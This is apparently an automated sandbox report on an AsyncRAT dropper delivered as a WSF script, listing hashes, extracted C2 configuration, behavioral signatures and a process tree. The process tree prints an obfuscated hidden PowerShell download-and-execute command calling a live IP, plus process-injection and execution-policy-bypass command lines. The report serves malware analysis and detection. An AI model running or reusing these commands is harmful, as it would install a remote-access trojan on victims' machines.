Analysis
-
max time kernel
92s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28/01/2025, 11:12
Static task
static1
Behavioral task
behavioral1
Sample
JxQdThApPv.WSF.wsf
Resource
win7-20241010-en
General
-
Target
JxQdThApPv.WSF.wsf
-
Size
465KB
-
MD5
5cd92159ae3ab267e6b71d0a38b1a135
-
SHA1
3bca9b4d7c2405b75019737ebb5f28719b4d307a
-
SHA256
0476cdaf6b93168281968fcc06d78b3384de95e4df98e06290bdd63bb6a8b3f1
-
SHA512
2cfa54c21444c1b03336bdb49f92bd420c856a824ec0f85bb31b187f13e422d106a4ef72c2d2ee794c7dc34e540afd8c82914a5f9ba2f9754adb92476bbf1d02
-
SSDEEP
12288:WYlYlYlYlYlYlYlYlYlYlYlYRYlYlYlYlYlYlYlYlYlYlYlY0YlYlYlYlYlYlYle:h
Malware Config
Extracted
asyncrat
AWS | 3Losh
00000001
81.10.39.58:7077
AsyncMutex_alosh
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 3 4412 WScript.exe 15 1020 powershell.exe 24 1020 powershell.exe 27 1020 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1020 powershell.exe 4628 powershell.exe 228 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 api.ipify.org 24 api.ipify.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4628 set thread context of 2312 4628 powershell.exe 95 PID 228 set thread context of 5100 228 powershell.exe 120 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1020 powershell.exe 1020 powershell.exe 4628 powershell.exe 4628 powershell.exe 2312 aspnet_compiler.exe 228 powershell.exe 228 powershell.exe 228 powershell.exe 228 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 1020 powershell.exe Token: SeIncreaseQuotaPrivilege 1020 powershell.exe Token: SeSecurityPrivilege 1020 powershell.exe Token: SeTakeOwnershipPrivilege 1020 powershell.exe Token: SeLoadDriverPrivilege 1020 powershell.exe Token: SeSystemProfilePrivilege 1020 powershell.exe Token: SeSystemtimePrivilege 1020 powershell.exe Token: SeProfSingleProcessPrivilege 1020 powershell.exe Token: SeIncBasePriorityPrivilege 1020 powershell.exe Token: SeCreatePagefilePrivilege 1020 powershell.exe Token: SeBackupPrivilege 1020 powershell.exe Token: SeRestorePrivilege 1020 powershell.exe Token: SeShutdownPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeSystemEnvironmentPrivilege 1020 powershell.exe Token: SeRemoteShutdownPrivilege 1020 powershell.exe Token: SeUndockPrivilege 1020 powershell.exe Token: SeManageVolumePrivilege 1020 powershell.exe Token: 33 1020 powershell.exe Token: 34 1020 powershell.exe Token: 35 1020 powershell.exe Token: 36 1020 powershell.exe Token: SeIncreaseQuotaPrivilege 1020 powershell.exe Token: SeSecurityPrivilege 1020 powershell.exe Token: SeTakeOwnershipPrivilege 1020 powershell.exe Token: SeLoadDriverPrivilege 1020 powershell.exe Token: SeSystemProfilePrivilege 1020 powershell.exe Token: SeSystemtimePrivilege 1020 powershell.exe Token: SeProfSingleProcessPrivilege 1020 powershell.exe Token: SeIncBasePriorityPrivilege 1020 powershell.exe Token: SeCreatePagefilePrivilege 1020 powershell.exe Token: SeBackupPrivilege 1020 powershell.exe Token: SeRestorePrivilege 1020 powershell.exe Token: SeShutdownPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeSystemEnvironmentPrivilege 1020 powershell.exe Token: SeRemoteShutdownPrivilege 1020 powershell.exe Token: SeUndockPrivilege 1020 powershell.exe Token: SeManageVolumePrivilege 1020 powershell.exe Token: 33 1020 powershell.exe Token: 34 1020 powershell.exe Token: 35 1020 powershell.exe Token: 36 1020 powershell.exe Token: SeDebugPrivilege 4628 powershell.exe Token: SeDebugPrivilege 2312 aspnet_compiler.exe Token: SeDebugPrivilege 228 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2312 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 37 IoCs
description pid Process procid_target PID 4412 wrote to memory of 1020 4412 WScript.exe 83 PID 4412 wrote to memory of 1020 4412 WScript.exe 83 PID 2224 wrote to memory of 1436 2224 WScript.exe 89 PID 2224 wrote to memory of 1436 2224 WScript.exe 89 PID 1436 wrote to memory of 4256 1436 net.exe 91 PID 1436 wrote to memory of 4256 1436 net.exe 91 PID 2224 wrote to memory of 3780 2224 WScript.exe 92 PID 2224 wrote to memory of 3780 2224 WScript.exe 92 PID 3780 wrote to memory of 4628 3780 cmd.exe 94 PID 3780 wrote to memory of 4628 3780 cmd.exe 94 PID 4628 wrote to memory of 2312 4628 powershell.exe 95 PID 4628 wrote to memory of 2312 4628 powershell.exe 95 PID 4628 wrote to memory of 2312 4628 powershell.exe 95 PID 4628 wrote to memory of 2312 4628 powershell.exe 95 PID 4628 wrote to memory of 2312 4628 powershell.exe 95 PID 4628 wrote to memory of 2312 4628 powershell.exe 95 PID 4628 wrote to memory of 2312 4628 powershell.exe 95 PID 4628 wrote to memory of 2312 4628 powershell.exe 95 PID 2456 wrote to memory of 2000 2456 WScript.exe 113 PID 2456 wrote to memory of 2000 2456 WScript.exe 113 PID 2000 wrote to memory of 4256 2000 net.exe 115 PID 2000 wrote to memory of 4256 2000 net.exe 115 PID 2456 wrote to memory of 4860 2456 WScript.exe 116 PID 2456 wrote to memory of 4860 2456 WScript.exe 116 PID 4860 wrote to memory of 228 4860 cmd.exe 118 PID 4860 wrote to memory of 228 4860 cmd.exe 118 PID 228 wrote to memory of 3612 228 powershell.exe 119 PID 228 wrote to memory of 3612 228 powershell.exe 119 PID 228 wrote to memory of 3612 228 powershell.exe 119 PID 228 wrote to memory of 5100 228 powershell.exe 120 PID 228 wrote to memory of 5100 228 powershell.exe 120 PID 228 wrote to memory of 5100 228 powershell.exe 120 PID 228 wrote to memory of 5100 228 powershell.exe 120 PID 228 wrote to memory of 5100 228 powershell.exe 120 PID 228 wrote to memory of 5100 228 powershell.exe 120 PID 228 wrote to memory of 5100 228 powershell.exe 120 PID 228 wrote to memory of 5100 228 powershell.exe 120
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JxQdThApPv.WSF.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$gGENXWVRcDoy='IeX(NeW-OBJeCT NeT.W';$ZPDsGQJSHtFC='eBCLIeNT).DOWNLO';$LnNvzWQSAEwo='repoooos(''http://45.88.186.162/test//update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($gGENXWVRcDoy+$ZPDsGQJSHtFC+$LnNvzWQSAEwo);2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\N6Mn2cyKv4.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" session2⤵
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\N6Mn2cyKv4.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\N6Mn2cyKv4.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2312
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Music\N6Mn2cyKv4.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" session2⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4256
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\N6Mn2cyKv4.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\N6Mn2cyKv4.ps1'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵PID:3612
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5100
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
1KB
MD5b29d1cb3e9761a90902c4a66a2ba3d5a
SHA163c64b29626976bc0a143d72f291bb50727dffbe
SHA256b998ed3cf206c4dac06d6028943a2f5accd73a93aca74420afe7480c464bf124
SHA51254bac9ee28a46f57bfac8fecb6d8af504cb483b70f62f06febd9768d4254b611a082c8191d93599ebfd4a5b75a85dd387b758db1439df89337473c8f68a3cd88
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD5414a0ec26fcf829d77ce6200892225b1
SHA11c92825a9384931a4a349e70f019d1d0a5559469
SHA25683e69d1f610e2974a2031bee57511c276953d4f250f26927b01e3b6b1129f745
SHA5127112bbb4376b524dce357db1a3a34e9b207f69f51d5eeffc7c1100990b2fcb951924e6c18207fad681b40fa9d394abe5aa170d491867b407be9ec5723c094896
-
Filesize
453KB
MD506355fdb659b0835a5cdf2096ae3c136
SHA1b64651a5e7f492032511e5439c9f3e5cd3a91e2e
SHA2569342a3d4d31647a0eaa30943fa97d24f08a3502e0a0a67b8b9ffba31ad4a77b9
SHA5129681dd315694733473ae9f2c07d19fd0617eccdd857c1038987db9e5c11bbf72e4e77874701dc1da5d318e19b1f29642c37a49e295ac3863b4f0e1d31e7b9111
-
Filesize
4KB
MD5ab8a4a6f0da1106552be4c4cfa5c1491
SHA19cb89e68c93ed6ea58d5d585cf14d9a9ed560fb9
SHA2567446773ad16120c2e8917f5bc98b5cc108525a7fe42e1f29398a673147a097cd
SHA512a18e118bb4156a5636e860e348a30b70d1390628b828a4b39d2ff13f3f25f0e18d9e9b02edd6fc79f5865ca1b293ffc7222b8e84ef02d58e8cbdf1247381e62c